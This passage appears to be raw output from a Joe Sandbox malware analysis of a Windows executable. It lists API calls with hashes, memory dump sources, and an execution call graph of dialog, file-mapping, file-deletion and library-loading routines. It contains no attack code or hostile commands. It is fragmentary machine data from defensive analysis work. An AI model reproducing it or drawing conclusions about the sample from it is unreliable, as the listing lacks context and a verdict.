• Instruction Fuzzy Hash: A701F7326001196BCB14DE29EC05BDE7BF9AFC5324F0DC234ED19DB254EA34E9018680
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0033D0F0: GetEnvironmentStringsW.KERNEL32 ref: 0033D0F9
  • Part of subcall function 0033D0F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033D11C
  • Part of subcall function 0033D0F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0033D142
  • Part of subcall function 0033D0F0: _free.LIBCMT ref: 0033D155
  • Part of subcall function 0033D0F0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033D164
• _free.LIBCMT ref: 00339670
• _free.LIBCMT ref: 00339677
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
• String ID: hB7
• API String ID: 400815659-3279407874
• Opcode ID: 592514f35efd861a882f7d73752c97b7f043c823d249be6ab8dd18c9509750a1
• Instruction ID: 11d2e1e417bebf3a0902b5ff0f25c258c4160e049837c16d8326091637097778
• Opcode Fuzzy Hash: 592514f35efd861a882f7d73752c97b7f043c823d249be6ab8dd18c9509750a1
• Instruction Fuzzy Hash: 82E02B22A0B810C1D633323E6CC3B6F02084BC1730F260317F828DE1C3DE948842019B
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,00322526,?), ref: 00322309
• GetLastError.KERNEL32(?), ref: 00322315
  • Part of subcall function 003176E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00317707
Strings
• WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0032231E
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ErrorLastObjectSingleWait__vswprintf_c_l
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 1091760877-2248577382
• Opcode ID: 19a3d905c41e3950e725a3095f11d96fb25f2bd73cb64ec46990b85235e6fd03
• Instruction ID: 871b2f6c4bafdd719858f9d784321a98bd2681d6cb85d7f42335693917b9e1f9
• Opcode Fuzzy Hash: 19a3d905c41e3950e725a3095f11d96fb25f2bd73cb64ec46990b85235e6fd03
• Instruction Fuzzy Hash: 9AD0123950892137C51367287C09EEEB9195B22770F290714F6355A1E1CE6009A181A5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,0031ED75,?), ref: 0031F5C3
• FindResourceW.KERNEL32(00000000,RTL,00000005,?,0031ED75,?), ref: 0031F5D1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: FindHandleModuleResource
• String ID: RTL
• API String ID: 3537982541-834975271
• Opcode ID: 1b880b6d277f01fd9269b93d3a5ff9f1e7b482788b9ce204a50b4fd25b503b81
• Instruction ID: a2e55fdea944c51a46405599d50f51549ad76ae86e09c8252c4240c28ec24ff6
• Opcode Fuzzy Hash: 1b880b6d277f01fd9269b93d3a5ff9f1e7b482788b9ce204a50b4fd25b503b81
• Instruction Fuzzy Hash: 2FC0123124475056D73227716C0DBC36E9C5B02755F060468B601DE1C0DEE5E8858660
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 9.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1497
Total number of Limit Nodes: 44
25264 74af9c 25263->25264 25272 74aff4 10 API calls 3 library calls 25263->25272 25267 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25264->25267 25266 74afdc LCMapStringW 25266->25264 25268 74aa60 25267->25268 25268->25248 25268->25249 25268->25256 25269->25256 25270->25238 25271->25256 25272->25266 25305 74c030 GetProcessHeap 25362 73c220 93 API calls _swprintf 25307 74f421 21 API calls __vswprintf_c_l 25308 721025 29 API calls 25337 74b4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25381 721710 86 API calls 25338 73ad10 73 API calls 25312 73a400 GdipDisposeImage GdipFree 25363 73d600 70 API calls 25313 746000 QueryPerformanceFrequency QueryPerformanceCounter 25341 742900 6 API calls 4 library calls 25364 74f200 51 API calls 25383 74a700 21 API calls 25344 7295f0 80 API calls 25345 73fd4f 9 API calls 2 library calls 25365 725ef0 82 API calls 23371 7498f0 23379 74adaf 23371->23379 23374 749904 23376 74990c 23377 749919 23376->23377 23387 749920 11 API calls 23376->23387 23388 74ac98 23379->23388 23382 74adee TlsAlloc 23384 74addf 23382->23384 23395 73fbbc 23384->23395 23385 7498fa 23385->23374 23386 749869 20 API calls 2 library calls 23385->23386 23386->23376 23387->23374 23389 74acc8 23388->23389 23393 74acc4 23388->23393 23389->23382 23389->23384 23390 74ace8 23390->23389 23392 74acf4 GetProcAddress 23390->23392 23394 74ad04 _unexpected 23392->23394 23393->23389 23393->23390 23402 74ad34 23393->23402 23394->23389 23396 73fbc5 IsProcessorFeaturePresent 23395->23396 23397 73fbc4 23395->23397 23399 73fc07 23396->23399 23397->23385 23409 73fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23399->23409 23401 73fcea 23401->23385 23403 74ad55 LoadLibraryExW 23402->23403 23404 74ad4a 23402->23404 23405 74ad72 GetLastError 23403->23405 23408 74ad8a 23403->23408 23404->23393 23407 74ad7d LoadLibraryExW 23405->23407 23405->23408 23406 74ada1 FreeLibrary 23406->23404 
23407->23408 23408->23404 23408->23406 23409->23401 23410 74abf0 23412 74abfb 23410->23412 23413 74ac24 23412->23413 23414 74ac20 23412->23414 23416 74af0a 23412->23416 23423 74ac50 DeleteCriticalSection 23413->23423 23417 74ac98 _unexpected 5 API calls 23416->23417 23418 74af31 23417->23418 23419 74af4f InitializeCriticalSectionAndSpinCount 23418->23419 23420 74af3a 23418->23420 23419->23420 23421 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23420->23421 23422 74af66 23421->23422 23422->23412 23423->23414 25315 7488f0 7 API calls ___scrt_uninitialize_crt 25317 742cfb 38 API calls 4 library calls 23461 73b7e0 23462 73b7ea __EH_prolog 23461->23462 23627 721316 23462->23627 23465 73b841 23466 73b82a 23466->23465 23469 73b89b 23466->23469 23470 73b838 23466->23470 23467 73bf0f 23706 73d69e 23467->23706 23476 73b92e GetDlgItemTextW 23469->23476 23477 73b8b1 23469->23477 23472 73b878 23470->23472 23473 73b83c 23470->23473 23472->23465 23484 73b95f EndDialog 23472->23484 23473->23465 23482 72e617 53 API calls 23473->23482 23474 73bf2a SendMessageW 23475 73bf38 23474->23475 23478 73bf52 GetDlgItem SendMessageW 23475->23478 23479 73bf41 SendDlgItemMessageW 23475->23479 23476->23472 23480 73b96b 23476->23480 23481 72e617 53 API calls 23477->23481 23724 73a64d GetCurrentDirectoryW 23478->23724 23479->23478 23485 73b980 GetDlgItem 23480->23485 23625 73b974 23480->23625 23488 73b8ce SetDlgItemTextW 23481->23488 23489 73b85b 23482->23489 23484->23465 23486 73b9b7 SetFocus 23485->23486 23487 73b994 SendMessageW SendMessageW 23485->23487 23491 73b9c7 23486->23491 23507 73b9e0 23486->23507 23487->23486 23492 73b8d9 23488->23492 23746 72124f SHGetMalloc 23489->23746 23490 73bf82 GetDlgItem 23494 73bfa5 SetWindowTextW 23490->23494 23495 73bf9f 23490->23495 23496 72e617 53 API calls 23491->23496 23492->23465 23501 73b8e6 GetMessageW 23492->23501 23725 73abab GetClassNameW 23494->23725 23495->23494 23502 73b9d1 23496->23502 23497 73b862 23497->23465 23508 
73c1fc SetDlgItemTextW 23497->23508 23498 73be55 23503 72e617 53 API calls 23498->23503 23501->23465 23505 73b8fd IsDialogMessageW 23501->23505 23747 73d4d4 23502->23747 23509 73be65 SetDlgItemTextW 23503->23509 23505->23492 23511 73b90c TranslateMessage DispatchMessageW 23505->23511 23512 72e617 53 API calls 23507->23512 23508->23465 23510 73be79 23509->23510 23513 72e617 53 API calls 23510->23513 23511->23492 23517 73ba17 23512->23517 23551 73be9c _wcslen 23513->23551 23514 73b9d9 23637 72a0b1 23514->23637 23516 73bff0 23520 73c020 23516->23520 23524 72e617 53 API calls 23516->23524 23521 724092 _swprintf 51 API calls 23517->23521 23519 73c73f 97 API calls 23519->23516 23530 73c73f 97 API calls 23520->23530 23581 73c0d8 23520->23581 23522 73ba29 23521->23522 23525 73d4d4 16 API calls 23522->23525 23529 73c003 SetDlgItemTextW 23524->23529 23525->23514 23526 73c18b 23532 73c194 EnableWindow 23526->23532 23533 73c19d 23526->23533 23527 73ba73 23643 73ac04 SetCurrentDirectoryW 23527->23643 23528 73ba68 GetLastError 23528->23527 23535 72e617 53 API calls 23529->23535 23531 73c03b 23530->23531 23541 73c04d 23531->23541 23573 73c072 23531->23573 23532->23533 23538 73c1ba 23533->23538 23765 7212d3 GetDlgItem EnableWindow 23533->23765 23534 73beed 23537 72e617 53 API calls 23534->23537 23539 73c017 SetDlgItemTextW 23535->23539 23537->23465 23544 73c1e1 23538->23544 23559 73c1d9 SendMessageW 23538->23559 23539->23520 23540 73ba87 23545 73ba9e 23540->23545 23546 73ba90 GetLastError 23540->23546 23763 739ed5 32 API calls 23541->23763 23542 73c0cb 23547 73c73f 97 API calls 23542->23547 23544->23465 23554 72e617 53 API calls 23544->23554 23548 73bb11 23545->23548 23552 73bb20 23545->23552 23553 73baae GetTickCount 23545->23553 23546->23545 23547->23581 23548->23552 23556 73bd56 23548->23556 23550 73c1b0 23766 7212d3 GetDlgItem EnableWindow 23550->23766 23551->23534 23555 72e617 53 API calls 23551->23555 23563 73bcfb 23552->23563 23564 73bcf1 23552->23564 23565 73bb39 
GetModuleFileNameW 23552->23565 23644 724092 23553->23644 23554->23497 23562 73bed0 23555->23562 23662 7212f1 GetDlgItem ShowWindow 23556->23662 23557 73c066 23557->23573 23559->23544 23569 724092 _swprintf 51 API calls 23562->23569 23572 72e617 53 API calls 23563->23572 23564->23472 23564->23563 23757 72f28c 82 API calls 23565->23757 23566 73c169 23764 739ed5 32 API calls 23566->23764 23567 73bd66 23663 7212f1 GetDlgItem ShowWindow 23567->23663 23568 73bac7 23647 72966e 23568->23647 23569->23534 23578 73bd05 23572->23578 23573->23542 23579 73c73f 97 API calls 23573->23579 23575 72e617 53 API calls 23575->23581 23576 73bb5f 23582 724092 _swprintf 51 API calls 23576->23582 23577 73c188 23577->23526 23583 724092 _swprintf 51 API calls 23578->23583 23584 73c0a0 23579->23584 23580 73bd70 23664 72e617 23580->23664 23581->23526 23581->23566 23581->23575 23587 73bb81 CreateFileMappingW 23582->23587 23588 73bd23 23583->23588 23584->23542 23589 73c0a9 DialogBoxParamW 23584->23589 23592 73bbe3 GetCommandLineW 23587->23592 23620 73bc60 __InternalCxxFrameHandler 23587->23620 23600 72e617 53 API calls 23588->23600 23589->23472 23589->23542 23591 73baed 23594 73baff 23591->23594 23595 73baf4 GetLastError 23591->23595 23596 73bbf4 23592->23596 23655 72959a 23594->23655 23595->23594 23758 73b425 SHGetMalloc 23596->23758 23597 73bd8c SetDlgItemTextW GetDlgItem 23601 73bdc1 23597->23601 23602 73bda9 GetWindowLongW SetWindowLongW 23597->23602 23604 73bd3d 23600->23604 23669 73c73f 23601->23669 23602->23601 23603 73bc10 23759 73b425 SHGetMalloc 23603->23759 23608 73bc1c 23760 73b425 SHGetMalloc 23608->23760 23609 73c73f 97 API calls 23611 73bddd 23609->23611 23694 73da52 23611->23694 23612 73bc28 23761 72f3fa 82 API calls 2 library calls 23612->23761 23614 73bccb 23614->23564 23619 73bce1 UnmapViewOfFile CloseHandle 23614->23619 23616 73bc3f MapViewOfFile 23616->23620 23618 73c73f 97 API calls 23624 73be03 23618->23624 23619->23564 23620->23614 23621 73bcb7 Sleep 23620->23621 
23621->23614 23621->23620 23622 73be2c 23762 7212d3 GetDlgItem EnableWindow 23622->23762 23624->23622 23626 73c73f 97 API calls 23624->23626 23625->23472 23625->23498 23626->23622 23628 721378 23627->23628 23629 72131f 23627->23629 23768 72e2c1 GetWindowLongW SetWindowLongW 23628->23768 23631 721385 23629->23631 23767 72e2e8 62 API calls 2 library calls 23629->23767 23631->23465 23631->23466 23631->23467 23633 721341 23633->23631 23634 721354 GetDlgItem 23633->23634 23634->23631 23635 721364 23634->23635 23635->23631 23636 72136a SetWindowTextW 23635->23636 23636->23631 23640 72a0bb 23637->23640 23638 72a14c 23639 72a2b2 8 API calls 23638->23639 23641 72a175 23638->23641 23639->23641 23640->23638 23640->23641 23769 72a2b2 23640->23769 23641->23527 23641->23528 23643->23540 23807 724065 23644->23807 23648 729678 23647->23648 23649 7296d5 CreateFileW 23648->23649 23650 7296c9 23648->23650 23649->23650 23651 72971f 23650->23651 23652 72bb03 GetCurrentDirectoryW 23650->23652 23651->23591 23653 729704 23652->23653 23653->23651 23654 729708 CreateFileW 23653->23654 23654->23651 23656 7295cf 23655->23656 23657 7295be 23655->23657 23656->23548 23657->23656 23658 7295d1 23657->23658 23659 7295ca 23657->23659 23891 729620 23658->23891 23886 72974e 23659->23886 23662->23567 23663->23580 23665 72e627 23664->23665 23906 72e648 23665->23906 23668 7212f1 GetDlgItem ShowWindow 23668->23597 23670 73c749 __EH_prolog 23669->23670 23676 73bdcf 23670->23676 23929 73b314 23670->23929 23673 73b314 ExpandEnvironmentStringsW 23683 73c780 _wcslen _wcsrchr 23673->23683 23674 73ca67 SetWindowTextW 23674->23683 23676->23609 23680 73c855 SetFileAttributesW 23681 73c90f GetFileAttributesW 23680->23681 23693 73c86f __cftof _wcslen 23680->23693 23681->23683 23685 73c921 DeleteFileW 23681->23685 23683->23673 23683->23674 23683->23676 23683->23680 23686 73cc31 GetDlgItem SetWindowTextW SendMessageW 23683->23686 23690 73cc71 SendMessageW 23683->23690 23933 731fbb CompareStringW 23683->23933 23934 
73a64d GetCurrentDirectoryW 23683->23934 23936 72a5d1 6 API calls 23683->23936 23937 72a55a FindClose 23683->23937 23938 73b48e 76 API calls 2 library calls 23683->23938 23939 743e3e 23683->23939 23685->23683 23687 73c932 23685->23687 23686->23683 23688 724092 _swprintf 51 API calls 23687->23688 23689 73c952 GetFileAttributesW 23688->23689 23689->23687 23691 73c967 MoveFileW 23689->23691 23690->23683 23691->23683 23692 73c97f MoveFileExW 23691->23692 23692->23683 23693->23681 23693->23683 23935 72b991 51 API calls 3 library calls 23693->23935 23695 73da5c __EH_prolog 23694->23695 23963 730659 23695->23963 23697 73da8d 23967 725b3d 23697->23967 23699 73daab 23971 727b0d 23699->23971 23703 73dafe 23987 727b9e 23703->23987 23705 73bdee 23705->23618 23707 73d6a8 23706->23707 24466 73a5c6 23707->24466 23710 73d6b5 GetWindow 23711 73bf15 23710->23711 23714 73d6d5 23710->23714 23711->23474 23711->23475 23712 73d6e2 GetClassNameW 24471 731fbb CompareStringW 23712->24471 23714->23711 23714->23712 23715 73d706 GetWindowLongW 23714->23715 23716 73d76a GetWindow 23714->23716 23715->23716 23717 73d716 SendMessageW 23715->23717 23716->23711 23716->23714 23717->23716 23718 73d72c GetObjectW 23717->23718 24472 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23718->24472 23720 73d743 24473 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23720->24473 24474 73a80c 8 API calls 23720->24474 23723 73d754 SendMessageW DeleteObject 23723->23716 23724->23490 23726 73abf1 23725->23726 23727 73abcc 23725->23727 23729 73abf6 SHAutoComplete 23726->23729 23730 73abff 23726->23730 24477 731fbb CompareStringW 23727->24477 23729->23730 23733 73b093 23730->23733 23731 73abdf 23731->23726 23732 73abe3 FindWindowExW 23731->23732 23732->23726 23734 73b09d __EH_prolog 23733->23734 23735 7213dc 84 API calls 23734->23735 23736 73b0bf 23735->23736 24478 721fdc 23736->24478 23739 73b0eb 23742 7219af 128 API calls 23739->23742 23740 73b0d9 23741 721692 86 API calls 23740->23741 23743 73b0e4 
23741->23743 23745 73b10d __InternalCxxFrameHandler ___std_exception_copy 23742->23745 23743->23516 23743->23519 23744 721692 86 API calls 23744->23743 23745->23744 23746->23497 24486 73b568 PeekMessageW 23747->24486 23750 73d502 23756 73d50d ShowWindow SendMessageW SendMessageW 23750->23756 23751 73d536 SendMessageW SendMessageW 23752 73d572 23751->23752 23753 73d591 SendMessageW SendMessageW SendMessageW 23751->23753 23752->23753 23754 73d5e7 SendMessageW 23753->23754 23755 73d5c4 SendMessageW 23753->23755 23754->23514 23755->23754 23756->23751 23757->23576 23758->23603 23759->23608 23760->23612 23761->23616 23762->23625 23763->23557 23764->23577 23765->23550 23766->23538 23767->23633 23768->23631 23770 72a2bf 23769->23770 23771 72a2e3 23770->23771 23772 72a2d6 CreateDirectoryW 23770->23772 23790 72a231 23771->23790 23772->23771 23774 72a316 23772->23774 23776 72a325 23774->23776 23782 72a4ed 23774->23782 23776->23640 23777 72a329 GetLastError 23777->23776 23780 72a2ff 23780->23777 23781 72a303 CreateDirectoryW 23780->23781 23781->23774 23781->23777 23797 73ec50 23782->23797 23785 72a510 23787 72bb03 GetCurrentDirectoryW 23785->23787 23786 72a53d 23786->23776 23788 72a524 23787->23788 23788->23786 23789 72a528 SetFileAttributesW 23788->23789 23789->23786 23799 72a243 23790->23799 23793 72bb03 23794 72bb10 _wcslen 23793->23794 23795 72bbb8 GetCurrentDirectoryW 23794->23795 23796 72bb39 _wcslen 23794->23796 23795->23796 23796->23780 23798 72a4fa SetFileAttributesW 23797->23798 23798->23785 23798->23786 23800 73ec50 23799->23800 23801 72a250 GetFileAttributesW 23800->23801 23802 72a261 23801->23802 23803 72a23a 23801->23803 23804 72bb03 GetCurrentDirectoryW 23802->23804 23803->23777 23803->23793 23805 72a275 23804->23805 23805->23803 23806 72a279 GetFileAttributesW 23805->23806 23806->23803 23808 72407c __vswprintf_c_l 23807->23808 23811 745fd4 23808->23811 23814 744097 23811->23814 23815 7440d7 23814->23815 23816 7440bf 23814->23816 23815->23816 23818 7440df 
23815->23818 23831 7491a8 20 API calls __dosmaperr 23816->23831 23833 744636 23818->23833 23819 7440c4 23832 749087 26 API calls ___std_exception_copy 23819->23832 23823 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23825 724086 23823->23825 23825->23568 23826 744167 23842 7449e6 51 API calls 3 library calls 23826->23842 23829 7440cf 23829->23823 23830 744172 23843 7446b9 20 API calls _free 23830->23843 23831->23819 23832->23829 23834 744653 23833->23834 23835 7440ef 23833->23835 23834->23835 23844 7497e5 GetLastError 23834->23844 23841 744601 20 API calls 2 library calls 23835->23841 23837 744674 23864 74993a 38 API calls __fassign 23837->23864 23839 74468d 23865 749967 38 API calls __fassign 23839->23865 23841->23826 23842->23830 23843->23829 23845 749801 23844->23845 23846 7497fb 23844->23846 23850 749850 SetLastError 23845->23850 23867 74b136 23845->23867 23866 74ae5b 11 API calls 2 library calls 23846->23866 23850->23837 23853 749830 23855 74981b 23853->23855 23856 749837 23853->23856 23854 749821 23858 74985c SetLastError 23854->23858 23874 748dcc 23855->23874 23881 749649 20 API calls _unexpected 23856->23881 23882 748d24 38 API calls _abort 23858->23882 23859 749842 23861 748dcc _free 20 API calls 23859->23861 23863 749849 23861->23863 23863->23850 23863->23858 23864->23839 23865->23835 23866->23845 23868 74b143 _unexpected 23867->23868 23869 74b183 23868->23869 23870 74b16e RtlAllocateHeap 23868->23870 23883 747a5e 7 API calls 2 library calls 23868->23883 23884 7491a8 20 API calls __dosmaperr 23869->23884 23870->23868 23872 749813 23870->23872 23872->23855 23880 74aeb1 11 API calls 2 library calls 23872->23880 23875 748e00 _free 23874->23875 23876 748dd7 RtlFreeHeap 23874->23876 23875->23854 23876->23875 23877 748dec 23876->23877 23885 7491a8 20 API calls __dosmaperr 23877->23885 23879 748df2 GetLastError 23879->23875 23880->23853 23881->23859 23883->23868 23884->23872 23885->23879 23887 729781 23886->23887 23890 729757 
23886->23890 23887->23656 23890->23887 23897 72a1e0 23890->23897 23892 72964a 23891->23892 23893 72962c 23891->23893 23894 729669 23892->23894 23905 726bd5 76 API calls 23892->23905 23893->23892 23895 729638 FindCloseChangeNotification 23893->23895 23894->23656 23895->23892 23898 73ec50 23897->23898 23899 72a1ed DeleteFileW 23898->23899 23900 72a200 23899->23900 23901 72977f 23899->23901 23902 72bb03 GetCurrentDirectoryW 23900->23902 23901->23656 23903 72a214 23902->23903 23903->23901 23904 72a218 DeleteFileW 23903->23904 23904->23901 23905->23894 23912 72d9b0 23906->23912 23909 72e645 SetDlgItemTextW 23909->23668 23910 72e66b LoadStringW 23910->23909 23911 72e682 LoadStringW 23910->23911 23911->23909 23917 72d8ec 23912->23917 23914 72d9cd 23916 72d9e2 23914->23916 23925 72d9f0 26 API calls 23914->23925 23916->23909 23916->23910 23918 72d904 23917->23918 23924 72d984 _strncpy 23917->23924 23919 72d928 23918->23919 23926 731da7 WideCharToMultiByte 23918->23926 23921 72d959 23919->23921 23927 72e5b1 50 API calls __vsnprintf 23919->23927 23928 746159 26 API calls 3 library calls 23921->23928 23924->23914 23925->23916 23926->23919 23927->23921 23928->23924 23930 73b31e 23929->23930 23931 73b3f0 ExpandEnvironmentStringsW 23930->23931 23932 73b40d 23930->23932 23931->23932 23932->23683 23933->23683 23934->23683 23935->23693 23936->23683 23937->23683 23938->23683 23940 748e54 23939->23940 23941 748e61 23940->23941 23942 748e6c 23940->23942 23952 748e06 23941->23952 23944 748e74 23942->23944 23950 748e7d _unexpected 23942->23950 23945 748dcc _free 20 API calls 23944->23945 23948 748e69 23945->23948 23946 748ea7 HeapReAlloc 23946->23948 23946->23950 23947 748e82 23959 7491a8 20 API calls __dosmaperr 23947->23959 23948->23683 23950->23946 23950->23947 23960 747a5e 7 API calls 2 library calls 23950->23960 23953 748e44 23952->23953 23954 748e14 _unexpected 23952->23954 23962 7491a8 20 API calls __dosmaperr 23953->23962 23954->23953 23956 748e2f RtlAllocateHeap 23954->23956 
23961 747a5e 7 API calls 2 library calls 23954->23961 23956->23954 23957 748e42 23956->23957 23957->23948 23959->23948 23960->23950 23961->23954 23962->23957 23964 730666 _wcslen 23963->23964 23991 7217e9 23964->23991 23966 73067e 23966->23697 23968 730659 _wcslen 23967->23968 23969 7217e9 78 API calls 23968->23969 23970 73067e 23969->23970 23970->23699 23972 727b17 __EH_prolog 23971->23972 24008 72ce40 23972->24008 23974 727b32 24014 73eb38 23974->24014 23976 727b5c 24023 734a76 23976->24023 23979 727c7d 23980 727c87 23979->23980 23982 727cf1 23980->23982 24055 72a56d 23980->24055 23985 727d50 23982->23985 24033 728284 23982->24033 23983 727d92 23983->23703 23985->23983 24061 72138b 74 API calls 23985->24061 23988 727bac 23987->23988 23990 727bb3 23987->23990 23989 732297 86 API calls 23988->23989 23989->23990 23992 7217ff 23991->23992 24003 72185a __InternalCxxFrameHandler 23991->24003 23993 721828 23992->23993 24004 726c36 76 API calls __vswprintf_c_l 23992->24004 23994 721887 23993->23994 23998 721847 ___std_exception_copy 23993->23998 23997 743e3e 22 API calls 23994->23997 23996 72181e 24005 726ca7 75 API calls 23996->24005 24000 72188e 23997->24000 23998->24003 24006 726ca7 75 API calls 23998->24006 24000->24003 24007 726ca7 75 API calls 24000->24007 24003->23966 24004->23996 24005->23993 24006->24003 24007->24003 24009 72ce4a __EH_prolog 24008->24009 24010 73eb38 8 API calls 24009->24010 24011 72ce8d 24010->24011 24012 73eb38 8 API calls 24011->24012 24013 72ceb1 24012->24013 24013->23974 24016 73eb3d ___std_exception_copy 24014->24016 24015 73eb57 24015->23976 24016->24015 24019 73eb59 24016->24019 24029 747a5e 7 API calls 2 library calls 24016->24029 24018 73f5c9 24031 74238d RaiseException 24018->24031 24019->24018 24030 74238d RaiseException 24019->24030 24022 73f5e6 24024 734a80 __EH_prolog 24023->24024 24025 73eb38 8 API calls 24024->24025 24026 734a9c 24025->24026 24027 727b8b 24026->24027 24032 730e46 80 API calls 24026->24032 24027->23979 
24029->24016 24030->24018 24031->24022 24032->24027 24034 72828e __EH_prolog 24033->24034 24062 7213dc 24034->24062 24036 7282aa 24037 7282bb 24036->24037 24202 729f42 24036->24202 24040 7282f2 24037->24040 24070 721a04 24037->24070 24198 721692 24040->24198 24043 728389 24089 728430 24043->24089 24046 7283e8 24094 721f6d 24046->24094 24050 7282ee 24050->24040 24050->24043 24053 72a56d 7 API calls 24050->24053 24206 72c0c5 CompareStringW _wcslen 24050->24206 24051 7283f3 24051->24040 24098 723b2d 24051->24098 24110 72848e 24051->24110 24053->24050 24056 72a582 24055->24056 24057 72a5b0 24056->24057 24455 72a69b 24056->24455 24057->23980 24059 72a592 24059->24057 24060 72a597 FindClose 24059->24060 24060->24057 24061->23983 24063 7213e1 __EH_prolog 24062->24063 24064 72ce40 8 API calls 24063->24064 24065 721419 24064->24065 24066 73eb38 8 API calls 24065->24066 24069 721474 __cftof 24065->24069 24067 721461 24066->24067 24067->24069 24208 72b505 24067->24208 24069->24036 24071 721a0e __EH_prolog 24070->24071 24083 721a61 24071->24083 24086 721b9b 24071->24086 24224 7213ba 24071->24224 24074 721bc7 24227 72138b 74 API calls 24074->24227 24076 723b2d 101 API calls 24080 721c12 24076->24080 24077 721bd4 24077->24076 24077->24086 24078 721c5a 24082 721c8d 24078->24082 24078->24086 24228 72138b 74 API calls 24078->24228 24080->24078 24081 723b2d 101 API calls 24080->24081 24081->24080 24082->24086 24088 729e80 79 API calls 24082->24088 24083->24074 24083->24077 24083->24086 24084 723b2d 101 API calls 24085 721cde 24084->24085 24085->24084 24085->24086 24086->24050 24087 729e80 79 API calls 24087->24083 24088->24085 24246 72cf3d 24089->24246 24091 728440 24250 7313d2 GetSystemTime SystemTimeToFileTime 24091->24250 24093 7283a3 24093->24046 24207 731b66 72 API calls 24093->24207 24095 721f72 __EH_prolog 24094->24095 24097 721fa6 24095->24097 24251 7219af 24095->24251 24097->24051 24099 723b39 24098->24099 24100 723b3d 24098->24100 24099->24051 24109 729e80 79 API calls 
24100->24109 24101 723b4f 24102 723b78 24101->24102 24103 723b6a 24101->24103 24382 72286b 101 API calls 3 library calls 24102->24382 24104 723baa 24103->24104 24381 7232f7 89 API calls 2 library calls 24103->24381 24104->24051 24107 723b76 24107->24104 24383 7220d7 74 API calls 24107->24383 24109->24101 24111 728498 __EH_prolog 24110->24111 24114 7284d5 24111->24114 24121 728513 24111->24121 24407 738c8d 103 API calls 24111->24407 24113 7284f5 24115 7284fa 24113->24115 24116 72851c 24113->24116 24114->24113 24118 72857a 24114->24118 24114->24121 24115->24121 24408 727a0d 152 API calls 24115->24408 24116->24121 24409 738c8d 103 API calls 24116->24409 24118->24121 24384 725d1a 24118->24384 24121->24051 24122 728605 24122->24121 24390 728167 24122->24390 24125 728797 24126 72a56d 7 API calls 24125->24126 24128 728802 24125->24128 24126->24128 24127 72d051 82 API calls 24135 72885d 24127->24135 24396 727c0d 24128->24396 24130 72898b 24412 722021 74 API calls 24130->24412 24131 728a5f 24136 728ab6 24131->24136 24149 728a6a 24131->24149 24132 728992 24132->24131 24137 7289e1 24132->24137 24135->24121 24135->24127 24135->24130 24135->24132 24410 728117 84 API calls 24135->24410 24411 722021 74 API calls 24135->24411 24144 728a4c 24136->24144 24415 727fc0 97 API calls 24136->24415 24141 72a231 3 API calls 24137->24141 24137->24144 24146 728b14 24137->24146 24138 729105 24143 72959a 80 API calls 24138->24143 24139 728ab4 24140 72959a 80 API calls 24139->24140 24140->24121 24145 728a19 